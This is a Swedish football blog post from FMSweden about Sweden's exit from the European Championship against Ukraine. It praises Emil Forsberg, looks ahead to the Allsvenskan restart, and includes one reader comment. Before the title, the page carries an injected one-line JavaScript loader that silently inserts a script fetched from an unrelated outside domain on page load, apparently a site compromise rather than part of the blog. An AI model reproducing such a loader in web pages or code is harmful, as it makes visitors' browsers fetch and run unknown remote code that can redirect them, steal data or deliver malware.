;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Konsten att åka ur – FMSweden
Meny Stäng

Fabbes blogg: Konsten att åka ur

Hur sammanfattar man ett svenskt mästerskap efter gårdagens uttåg? Jag ger mig på ett försök i veckans blogg.

Först av allt måste man nog bryta ner mästerskapet match för match. Alla vet att vi knep en poäng mot Spanien, slog Slovakien och sist men inte minst avgjorde i sista minuten mot Polen. Gruppseger och det på förhand lättaste motståndet i en åttondelsfinal. Inför gårdagens match var jag livrädd – men främst pga att folk redan pratade om både kvartsfinal och semifinal. Många hade redan räknat med att vi slagit ut Ukraina, och diskuterade hurvida det var bra eller dåligt med England i en kvartsfinal. Precis som jag skrev i inlägget inför EM var jag lite frågande till förväntningarna på vårat landslag, och så var fallet även inför gårdagens match. Men om man ska summera så var väl en åttondel precis det som var rimligt för Sverige och därmed tycker jag man gör en godkänd turnering, där Emil Forsberg sticker ut som den klarast lysande stjärnan. Sättet han dominerade på under det här mästerskapet var något av de värsta jag sett i en svensk landslagströja. Har vi ens se Zlatan vara lika dominant i landslaget?
Slutligen kan vi konstatera att det var det absolut tuffaste sättet att åka ut på. Vi kan också dra slutsatsen att Jonas Eriksson kan mer om domslut än Gary Lineker, och att Forsbergs ribbträff har potetial att bli en ny “Svensson mot Senegal”.

Alla hanterar förluster olika. Vissa av er har säkert haft en förjävlig natt och dag, där ni bara inte kan släppa förlusten. Så brukar det vara för mig med, men inte den här gången faktiskt. Istället ser jag fram emot forsättningen av slutspelet – vi har otroligt mycket bra fotboll kvar av det här mästerskapet!


I helgen drar allsvenskan igång igen. IFK Göteborg-Elfsborg på lördag, och jag känner ungefär noll pepp alls. Jag är i EM-bubblan nu och övrig fotboll får vänta tills finalen är spelad. Men glädjs något enormt med er som äntligen ska få se fotboll på plats. Kör hårt!


När kvartsfinalerna nu är på gång tror jag på att England står som vinnare när EM är färdigspelat. Vad tror ni?

Please wait...

Liknande Inlägg

2 kommentarer

  1. raca14

    Tyvärr tar väl Spanien hem det hela, även om jag hellre ser Italien eller England vinna. Sedan är min outsider Danmark för det hela. Dom har ju trots allt rest sig något enormt mycket sedan första matchen och vad som hände då.

Lämna ett svar